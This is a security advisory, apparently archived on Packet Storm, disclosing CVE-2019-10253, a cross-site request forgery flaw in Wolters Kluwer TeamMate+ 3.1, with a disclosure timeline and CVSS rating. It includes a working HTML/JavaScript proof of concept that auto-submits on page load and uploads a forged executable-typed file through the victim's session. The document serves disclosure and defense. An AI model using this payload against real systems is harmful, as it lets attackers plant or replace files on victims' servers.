what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Wolters Kluwer TeamMate+ 3.1 Cross Site Request Forgery

Wolters Kluwer TeamMate+ 3.1 Cross Site Request Forgery
Posted Sep 2, 2019
Authored by Bhadresh Patel

Wolters Kluwer TeamMate+ version 3.1 with internal version 21.0.0.0 suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
advisories | CVE-2019-10253
SHA-256 | 9c9904018fb90a7c70010a0eccd32a66278cccb347c136edc61acdf8c6bc15d2

Wolters Kluwer TeamMate+ 3.1 Cross Site Request Forgery

Change Mirror Download
Title:
====

Wolters Kluwer TeamMate+ – Cross-Site Request Forgery (CSRF) vulnerability


Credit:
======

Name: Bhadresh Patel


CVE:

====

CVE-2019-10253

Date:
====

19/03/2019 (dd/mm/yyyy)

Vendor:
======

Wolters Kluwer is a global leader in professional information, software solutions, and services for the health, tax & accounting, finance, risk & compliance, and legal sectors. We help our customers make critical decisions every day by providing expert solutions that combine deep domain knowledge with specialized technology and services.

Vendor link: http://www.teammatesolutions.com/about-us.aspx


Vulnerable Product:
==============

TeamMate+


TeamMate Global Audit Solutions, part of the Tax and Accounting Division of Wolters Kluwer, helps professionals in all industries at organizations around the world manage audit and compliance risks and business issues by providing targeted, configurable, and efficient software solutions. Solutions include TeamMate+ Audit, TeamMate+ Controls, and TeamMate Analytics. Together, this ecosystem of solutions provides organizations with the combined assurance they need to manage all aspects of risk identification and assessment, electronic working paper creation and management, controls framework management, and data analysis.



Abstract:
=======

Cross-Site Request Forgery (CSRF) vulnerability in TeamMate+ could allow an attacker to upload malicious/forged files on TeamMate server or replace existing uploaded files with malicious/forged files by enticing authenticated user to visit attacker page.


Report-Timeline:

=============

19/03/2019: Vendor notified

19/03/2019: Vendor responded requesting further information

20/03/2019: Further technical information with PoC was shared with vendor

01/07/2019: Vendor fixed the issue in version 3.2


Affected Software Version:
=============

<= TeamMate January 2019 (Version 3.1) (Internal Version: 21.0.0.0)


Exploitation-Technique:
===================

Remote


Severity Rating (CVSS):
===================

4.3 (Medium) (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N)


CVE ID:

=======


CVE-2019-10253


Details:
=======

A Cross-Site Request Forgery (CSRF) vulnerability is discovered in TeamMate+ which allows a remote attacker to modify application data (upload malicious/forged files on TeamMate server or replace existing uploaded files with malicious/forged files) without victim's knowledge by enticing authenticated user to visit attacker page/URL.


The specific flaw exists within the handling of request to “DomainObjectDocumentUpload.ashx” application. An application failed to validate CSRF token before handling the POST request.


Vulnerable module/page/application: /TeamMate/Upload/DomainObjectDocumentUpload.ashx



PoC Exploit code:
----------------------------------------------------------------------------



<html>



<body onload="submitRequest()">

<script>

function submitRequest()

{

var xhr = new XMLHttpRequest();

xhr.open("POST", "https://<ServerIP>/TeamMate/Upload/DomainObjectDocumentUpload.ashx", true);

xhr.setRequestHeader("Accept", "text/html, */*; q=0.01");

xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9,ar;q=0.8");

xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryNA930lURoQYsoTOn");

xhr.withCredentials = true;

var body = "------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +

"Content-Disposition: form-data; name=\"fileObjectId\"\r\n" +

"\r\n" +

"0\r\n" +

"------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +

"Content-Disposition: form-data; name=\"parentId\"\r\n" +

"\r\n" +

"1373\r\n" +

"------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +

"Content-Disposition: form-data; name=\"AssessmentId\"\r\n" +

"\r\n" +

"34\r\n" +

"------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +

"Content-Disposition: form-data; name=\"ProjectId\"\r\n" +

"\r\n" +

"1106\r\n" +

"------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +

"Content-Disposition: form-data; name=\"ParentNodeType\"\r\n" +

"\r\n" +

"50\r\n" +

"------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +

"Content-Disposition: form-data; name=\"DocumentParentObjectType\"\r\n" +

"\r\n" +

"90\r\n" +

"------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +

"Content-Disposition: form-data; name=\"files[]\"; filename=\"Report.txt\"\r\n" +

"Content-Type: application/x-msdownload\r\n" +

"\r\n" +

"MZP\r\n" +

"------WebKitFormBoundaryNA930lURoQYsoTOn--\r\n";

var aBody = new Uint8Array(body.length);

for (var i = 0; i < aBody.length; i++)

aBody[i] = body.charCodeAt(i);

xhr.send(new Blob([aBody]));

}

</script>



</body>

</html>



----------------------------------------------------------------------------


Credits:
=======

Bhadresh Patel
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    17 Files
  • 21
    May 21st
    18 Files
  • 22
    May 22nd
    7 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close